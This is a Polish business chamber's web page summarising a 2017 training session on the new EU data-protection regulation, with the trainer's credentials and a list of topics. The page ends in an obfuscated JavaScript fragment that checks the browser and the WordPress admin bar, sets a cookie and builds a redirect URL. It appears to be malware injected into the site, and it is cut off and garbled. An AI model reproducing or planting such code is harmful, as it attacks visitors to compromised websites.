Nowe unijne przepisy o ochronie danych osobowych – JAK PRZYGOTOWAĆ SIĘ DO ZMIAN | Północna Izba Gospodarcza w Koszalinie

Koszalin, 21 kwietnia 2017r.

Informacja po szkoleniu: “NOWE UNIJNE PRZEPISY O OCHRONIE DANYCH OSOBOWYCH – JAK PRZYGOTOWAĆ SIĘ DO ZMIAN”.

 

Szanowni Państwo,

Dziękujemy za udział w kolejnym bezpłatnym szkoleniu dla przedsiębiorców Północnej Izby Gospodarczej. Po raz trzeci swoją wiedzą podzieliła się z nami firma SPEKTRUM, tym razem przez Pana Przemysława Chojnowskiego w szkoleniu “NOWE UNIJNE PRZEPISY O OCHRONIE DANYCH OSOBOWYCH – JAK PRZYGOTOWAĆ SIĘ DO ZMIAN”.

Zachęcamy Państwa do kontaktu z firmą SPEKTRUM w celu ustalenia pełnych zindywidualizowanych szkoleń www.spektrum-szkolenia.pl, biuro@spektrum-szkolenia.pl lub telefonicznie 697 709 556, 535 895 551.

Przemysław Chojnowski – Trener z zakresu ochrony danych osobowych oraz praktyk bazujący na doświadczeniu nabytym w trakcie realizacji wielu szkoleń oraz zadań związanych z przygotowaniem praktycznym firm w zakresie realizacji ochrony danych osobowych. Jest członkiem Stowarzyszenia Administratorów Bezpieczeństwa Informacji. Posiada certyfikat „Auditora wewnętrznego systemu zarządzania bezpieczeństwem informacji wg ISO/IEC 27001-2013”. Osobiście przeprowadził ponad 150 szkoleń z zakresu ochrony danych osobowych, przygotował dokumentację z zakresu UODO w ponad 20 firmach, a także jest administratorem bezpieczeństwa informacji w 10 firmach z sektora publicznego i prywatnego realizując usługę outsourcingu danych osobowych. Podczas szkoleń bazuje na swoim doświadczeniu zdobytym w trakcie ponad dziesięcioletniego kierowania pionem łączności i informatyki w Centralnym Ośrodku Szkolenia Straży Granicznej w Koszalinie oraz pełnienia funkcji wiceprzewodniczącego komisji elektroenergetycznej przy Komendancie Głównym Straży Granicznej, posiada uprawnienia budowlane w telekomunikacji. Podczas szkoleń wykorzystuje swoje kompetencje trenerskie zdobyte na wielu szkoleniach trenerskich i coachingowych potwierdzonych certyfikatem ACC ICF.

Podczas warsztatu dowiedzieliśmy się:

  • jakie podstawowe zmiany wprowadza rozporządzenie unijne z zakresu ochrony danych osobowych;
  • jakie są podstawy przetwarzania danych osobowych;
  • jakie obowiązki należą do przedsiębiorcy w roli administratora danych osobowych;
  • jakie kary finansowe mogą zostać nałożone na podmiot niewłaściwie wypełniający przepisy prawa.

 

'toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’http://’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[’push’](c[’shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(’0x7′)][b(’0x8′)](’;’);for(var m=0x0;m